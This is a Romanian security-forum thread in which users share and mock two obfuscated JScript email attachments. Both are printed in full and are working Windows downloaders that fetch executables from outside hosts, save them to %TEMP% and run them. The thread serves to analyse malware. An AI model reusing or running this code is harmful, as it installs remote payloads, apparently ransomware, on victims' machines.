Nytro Posted May 12, 2016 Report Share Posted May 12, 2016 Salut, Am mai primit un email cu un JS intr-un ZIP. E stupid, incepe cu comentarii, are pe la mijloc codul si se termina cu comentarii. In fine, JS-ul e urmatorul: var WARRANTIES0 = false; var mousemove0 = ""; var code; var delts = "C" + "r"+"e"+"ateObject"; /*@cc_on /* QU5zoJYpASu6 */ @if (@_win32 || @_win64)/* QU5zoJYpASu6 */ // WARRANTIES0 /* QU5zoJYpASu6 */= true;/* QU5zoJYpASu6 */ mousemove0/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */"MLH";/* QU5zoJYpASu6 */ code =/* QU5zoJYpASu6 */ "R" + "esponseB"/* QU5zoJYpASu6 */ + "ydo".split('').reverse().join(''); objref = /* QU5zoJYpASu6 */(/* QU5zoJYpASu6 */"noitisop").split(''/* QU5zoJYpASu6 */).reverse(/* QU5zoJYpASu6 */).join(''); directionally0/* QU5zoJYpASu6 */ =/* QU5zoJYpASu6 */ "eliFoTevaS".split(''/* QU5zoJYpASu6 */).reverse().join(''); B12F40 = "A"+"DODB"; mousemove1 = "s" + "end"; dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; dishy0 /* QU5zoJYpASu6 */ = "G\x45"+"T"; /* QU5zoJYpASu6 */ @end/* QU5zoJYpASu6 */ @*//* QU5zoJYpASu6 */ if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } var Summary/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */this[/* QU5zoJYpASu6 */"WScript"/* QU5zoJYpASu6 */]/* QU5zoJYpASu6 */; var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3; var Amount0 = 1 * (2 - 0); var countRemain = Amount0 - ((1 * 2) + 0) * 1; function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);}; function cir(){return delts;}; { var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP"; var delay = ""; delay = "o"+"pen"; function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;}; if (true){ penetration1 = code0; cos1 = Summary[delts](penetration1); var WARRANTIES = 3-2; do { for (;WARRANTIES;){ try { if (WARRANTIES == 1) { cos1[delay](dishy0 /* QU5zoJYpASu6 */, dishy, (true, false)); cos1[mousemove1](); cos0 = "S"+"l"+"eep"; WARRANTIES = 2; } Summary[cos0](120); if (cos1["r"+"eadystate"] < 2 * 2) continue; WARRANTIES = countRemain; function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;}; FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e"; countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat"; objref0 = "start "+FFFFF0+"\r\nexit" penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; Amount /* QU5zoJYpASu6 */ = "w"+"r"+"i"+"t"+"e"; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"](objref0); directionally1[objref] = 1 * 0; penetration1[directionally0](countRemain0, 2 * 1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 2; penetration1["Charset"] = "windows-1251"; penetration1[Amount+"Text"]("M"); directionally1[objref] = 0; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m"); penetration1[delay](); penetration1["t"+"y"+"pe"] = 1 * 1; penetration1[Amount](cos1[code]); directionally1[objref] = 1; penetration(penetration1); directionally1["c"+"l"+"o"+"s"+"e"](); if (1 && WARRANTIES0) directionally(countRemain0); } catch(cir0){};}; }while (WARRANTIES); } } E "obfuscat" cu pula dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; Ma intreb ce nationalitate o avea autorul: if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } Haideti baietii, puteti mai mult! 2 Link to comment Share on other sites More sharing options...
Speed123 Posted May 12, 2016 Report Share Posted May 12, 2016 Vroiau sa te infecteze Nytro , Arde-i ! Poate au aflat si indienii de pizda Link to comment Share on other sites More sharing options...
yo20063 Posted May 12, 2016 Report Share Posted May 12, 2016 Sufera tare cine la scris. Parerea mea e ca putea face ceva mult mai destept, mult mai usor, fara atat de mult +str()... Link to comment Share on other sites More sharing options...
malsploit Posted May 16, 2016 Report Share Posted May 16, 2016 Am vreo vreo 20 de adrese de email pe care le tin ca spam-trap si a fost o perioada, pe la inceputul anului, in care primeam zilnic. Faceau spread pentru un locker Link to comment Share on other sites More sharing options...
nein Posted May 17, 2016 Report Share Posted May 17, 2016 Spoiler _ = 38417, vim = "B%0A%09%09ante%20%3D%20Knox%3B%0A%09", Find = "del"; e080 = "DELE"; pasv = "0%5Cx6cac%5Cx65%22%5D%28/GPL2/%2C%20%22%5Cx", Aviv = "_z"; ins = "_hsl", EREG = "x35%5Cx47%5Cx36%5Cx341%5Cx314%5Cx47%5Cx74", dot = "More", WIN = "Day", e052 = "2.replace%28/hi/%2C%20%22/%5Cx53%5C"; var mark = "walk", e089 = "End"; Bump = "5Cx64%22%5B%22%5Cx72%5Cx65p%5Cx6c%5Cx61%5C"; var kses = "pop", amet = "ce%28/IF/%2C%20%22%5Cx53%5Cx63%5Cx7", b3db = 2, Cop = "var%20Knox%20%3D%20%22Nav%22%2C%20_%20%3"; Old = "A%09zx%24vf%28%29%3B%0Atry%20%7B%0A%09%09Kn"; var ow = "D%2041245%3B%0Avar%20co%20%3D%20%22_dir%22%3B", yi = "%0Awild%20%3D%20%22http%3A//gbi-stroi.u7m"; Link = "te.position%20%3D%200%3B%0A%7D%0A%09w%24g"; resp = ".ru/img/.../log.php%3Ff%3D%22%2C%0A", XFN = "e030%20%3D%20%22isn%22%3B%20ante%20%3D%20%22"; e192 = "s%5D%3B%0A%7D%0A%09au%24th%28%29%3B%0A"; f161 = "runs%22%3B%20var%20omit%20%3D%20%22", Cras = "ccc%22%3B%20var%20TYPE%20%3D%20%22dc%"; var but = "5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%5D%28/"; know = "22%2C%20thus%20%3D%200%2C%0Af335%20%", w3 = "8Motu%29%20%7B%0A%09%09%22C%5Cx52O%5Cx4e%22%", io = "3D%20%22ico%22%3B%20raw%20%3D%20%22403%2", IXR = "2%2C%0Aog%20%3D%20%22fed%22%2C%0AOrd%20%3D"; tied = "Cx6f%5Cx64%5Cx79%22%29%5D%29%3B%0A%09%09an"; w2 = "%20%22_nx%22%2C%0APast%20%3D%201%3B%0Avar%2", gift = "0UA%20%3D%20%22tel%22%3B%0Avar%20St%20", Rica = "29%3B%09Z_%20%3D%20co%20%3D%20Knox%3B%0Afun"; var mind = "%3D%20%22rtl%22%2C%0AZ_%20%3D%20%22rec"; neat = "t%22%2C%20vi%20%3D%20%22weak%22%3B%20va"; SET = "5Cx66%5Cx61ke%22%3B%0A%7D%20catch%20%28p%29"; var held = "r%20e178%20%3D%20%22su%22%3B%20var%20", ho = "Rome%20%3D%202%2C%0Af30%20%3D%20%22Out%22", Send = "Set"; GB = "%3B%0A%0Ae030%20%3D%20omit%20%3D%20f335%20"; pi = "Cx2eStrea%5Cx6d%22%29%29%3B%0A%7D%0A%3B%0"; var apps = "%3D%20this%3B%0Afunction%20f100%28%29%0A"; am = "%7B%0A%09Ord%20%3D%20e030%5B%22P%5Cx61%5Cx"; f227 = "3B%0A%7D%0A%09Knox.type%20%3D%20%20%2B%2"; Give = "6c%5Cx69%22.replace%28/Pali/%2C%20%22%5Cx57%5", dd = "Cx53%5Cx63r%5Cx69p%5Cx74%22%29%5D%3B%0A%7D%0", a74 = "x63%5Cx65%22%5D%28/gid/%2C%20%22%5Cx52%5Cx"; gp = "Af100%28%29%3B%0AUA%20%3D%20Ord%5B%22%5Cx4f", some = "%5Cx72%5Cx61l%22%5B%22r%5Cx65%5Cx70%5Cx6c%5C", usr = "ment%28%22%5Cx47%5Cx50L%5Cx32%22%5B%22re%5Cx7"; How = "x61%5Cx63%5Cx65%22%5D%28/Oral/%2C%20", e126 = "%22%5Cx43r%5Cx65%5Cx61t%5Cx65%5Cx4fb", Test = "ction%20au%24th%28%29%0A%7B%0A%09%09"; amp = "%5Cx6a%5Cx65%5Cx63%5Cx74%22%29%5D%28%22%5"; var ereg = "%5D.split%28%22%5Cx2e%22%29%5B%20%2B%20thu"; var sbug = "Cx48%5Cx6fok%22.replace%28/Hook/%2C%20", HTTP = "%22%5Cx57%5Cx53%5Cx63r%5Cx69%5Cx70%5Cx", peek = "%20%7B%0A%09%09Z_%5Be178%5D%28St%28%22%5", tube = "74.%5Cx53%5Cx68%5Cx65ll%22%29%29%3B%", tech = "0Avi%20%3D%20omit%5B%22%5Cx661%5Cx35%", Yi = "%29%3B%0A%7D%0A%7D%0A%0A"; var cell = "5Cx39%22%5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%", tmp = "5D%28/f159/%2C%20%22%5Cx41ct%5Cx69%5Cx76%5Cx6"; iso = "SVG/%2C%20%22AD%5Cx4f%5Cx44%5Cx42%5"; tan = "5X%5Cx4f%5Cx62%5Cx6a%5Cx65%5Cx63t%22%29%5D%3"; var mit = "B%0Atry%20%7B%0A%09f335%20%3D%20e030%3B%0A%0"; var e96 = "ox.open%28%29%3B%0A%7D%20catch%20%2", AYS = "9f30%20%3D%20TYPE.BrowseForFolder%280%2C%20"; fb8 = "%22%5Cx66%5Cx31%5Cx35%5Cx37%22%5B%22%5Cx72e", RNTO = "0Past%3B%0Afunction%20w%24get%28%29%0A%7", soon = "%5Cx70l%5Cx61ce%22%5D%28/f157/%2C%2"; UCT = "%09ante.write%28og%5B%22%5Cx67%5Cx69%"; var blue = "0%22%5Cx53%5Cx65l%5Cx65%5Cx63%5Cx74Fol"; var Url = "de%5Cx72%22%29%2C%20%20%2B%20thus%29%3B%0A"; var f228 = "65%5Cx73%5Cx70o%5Cx6e%5Cx73%5Cx65%5Cx42%5", To = "%7D%20catch%20%28Connection%29%20%7B%0A"; e136 = "function%20Long%28%29%0A%7B%0A%09%09f30%", bars = "et%28%29%3B%0ASt%20%3D%20UA.Environ", Afar = "20%3D%20wild%20%2B%20raw%3B%0A%7D%0A%09Long%", htm = "28%29%3B%0Atry%20%7B%0A%09%09this%20", Data = "50ro%5Cx63%5Cx65%5Cx73%5Cx73%22%29%", alt = "%3D%20%22%5Cx76i%5Cx6d%22%3B%0A%7D%20ca", Long = "tch%20%28conf%29%20%7B%0A%09%09og%20%3D%", pro = "e178%20%3D%20Ord%5B%22%5Cx49F%22.repla", msn = "20new%20vi%28%22%5Cx4d%5Cx4d%22%5B%22%5Cx72%5"; conf = "2%5Cx69%5Cx70%5Cx74%5Cx4ea%5Cx6d%5Cx65%22%29"; e078 = "Cx65%5Cx70%5Cx6c%5Cx61%5Cx63e%22%5D%28/MM/%2C", high = "%20%22%5Cx4d%5Cx73%5Cx78%5Cx6dl%5Cx32%5Cx2eX"; var File = "try%20%7B%0A%09%09this%20%3D%20%22%"; e193 = "%5Cx4d%5Cx4c%5Cx48%5Cx54%5Cx54P%5Cx2e6%5Cx2", gee = "e%5Cx30%22%29%29%3B%0A%09%09og.open%2"; var sin = "Cx74em%5Cx70%22%29%20%2B%20%22%5Cx68i%2", ba = "8%22%5Cx47ET%22%2C%20f30%2C%200%29%3B%0A%", fat = "7D%0A%09og.send%28%29%3B%0A%09Ord.S"; var A1B1 = "%5Cx2e%5Cx65x%5Cx65%22%29%2C%20%20%2B%20Rome"; Redo = "leep%288193%29%3B%0A%09zx%24vf%20%3D", back = "%20function%28%29%0A%7B%0A%09Knox%20%"; Load = "3D%20new%20vi%28%22%5Cx53V%5Cx47%22%"; Find = e080 = Aviv = this; ins = this["I\x74"["\x72ep\x6c\x61c\x65"](/It/, "\x57\x53\x63\x72\x69\x70\x74")]; function fi$le() { dot = ins.CreateObject("\x6ctr".replace(/ltr/, "\x57S\x63\x72\x69pt\x2e\x53\x68ell")); WIN = new Find.ActiveXObject("\x651\x310"["\x72\x65\x70\x6c\x61c\x65"](/e110/, "S\x63r\x69\x70t\x69\x6eg.\x46\x69\x6ce\x53\x79\x73t\x65\x6d\x4f\x62j\x65ct")); mark = dot.Environment("\x76e".replace(/ve/, "P\x72\x6f\x63\x65\x73\x73")); } fi$le(); try { this = "\x49\x63o\x6e"; } catch (U) { e089 = mark("\x74e\x6dp") + "fa\x69r"["r\x65p\x6c\x61ce"](/fair/, "/\x73\x61\x76\x65\x54oF\x69\x6c\x65\x2e\x6a\x73"); } kses = WIN.OpenTextFile(e089, + b3db, true, 0); ugly$ = function() { kses.write(unescape(Cop + ow + yi + resp + XFN + f161 + Cras + know + io + IXR + w2 + gift + mind + neat + held + ho + GB + apps + am + Give + dd + gp + some + How + e126 + amp + sbug + HTTP + tube + tech + cell + tmp + tan + mit + AYS + fb8 + soon + blue + Url + To + e136 + Afar + htm + alt + Long + msn + e078 + high + e193 + gee + ba + fat + Redo + back + Load + but + iso + pi + Old + e96 + w3 + f227 + RNTO + vim + UCT + Bump + a74 + f228 + tied + Link + bars + usr + pasv + Data + Rica + Test + pro + amet + conf + ereg + e192 + File + SET + peek + sin + e052 + EREG + A1B1 + Yi)); kses.close(); dot.Run(e089); ins.Sleep(12000); Send = mark("\x74\x65\x6dp") + "\x6c".replace(/l/, "\x2f\x53\x35G\x36\x34\x31\x314\x47\x74.\x65\x78\x65"); dot.Run(Send); } ; ugly$(); aiureaaaaaaa ! si eu am primit Link to comment Share on other sites More sharing options...